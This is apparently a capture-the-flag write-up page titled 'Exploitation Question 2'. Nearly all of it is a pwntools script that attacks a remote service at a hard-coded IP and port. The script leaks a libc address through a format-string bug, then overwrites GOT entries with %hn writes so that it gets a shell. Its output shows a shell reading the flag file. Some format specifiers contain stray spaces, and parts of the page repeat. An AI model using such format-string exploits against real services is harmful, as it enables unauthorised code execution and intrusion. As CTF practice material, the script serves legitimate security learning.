from pwn import *

0x804b084 stdout@got.plt

0x804b018 fflush@got.plt

0x804b010 dup2@got.plt

r = remote("34.198.96.6", 9002) r.recvuntil("Enter name: ") r.sendline("%8$s") r.recvuntil("Enter password: ") r.sendline(p32(0x804b010)) r.recvuntil("Invalid password for username: ") base_libc = u32(r.recv(4).ljust(4, '\0')) - 0xda1c0 r.close()

p_system = base_libc + 0x3fe70 p_bin_sh = base_libc + 0x15da8c

p_system_hi = (p_system & 0xffff0000) >> 16 p_system_lo = (p_system & 0xffff) p_bin_sh_hi = (p_bin_sh & 0xffff0000) >> 16 p_bin_sh_lo = (p_bin_sh & 0xffff)

print "base_libc: %x" % base_libc print "p_system: %x" % p_system print "p_system_bin_sh: %x" % p_bin_sh

r = remote("34.198.96.6", 9002) r.recvuntil("Enter name: ") r.sendline("%" + str(p_system_lo - 31) + "d%8 $hn%" + str(p_system_lo - p_system_hi) + "d%9$ hn%" + str("17") + "d%10 $hn%" + str(p_bin_sh_lo + 2197) + "d%11$ hn") r.recvuntil("Enter password: ") r.sendline(p32(0x804b018) + p32(0x804b01a) + p32(0x804b086) + p32(0x804b084)) r.interactive()

''' $id uid=1000(bob) gid=1000(bob) groups=1000(bob)$ cat flag.txt flag{1nF0L34K4Th3W1n} '''

Original writeup (https://gist.github.com/soez/b53d5999d7517c011a9d323aa72d750a).

Exploitation Question 2

0x804b084 stdout@got.plt

0x804b018 fflush@got.plt

0x804b010 dup2@got.plt

Comments

Exploitation Question 2

0x804b084 stdout@got.plt

0x804b018 fflush@got.plt

0x804b010 dup2@got.plt

Comments

Sign in with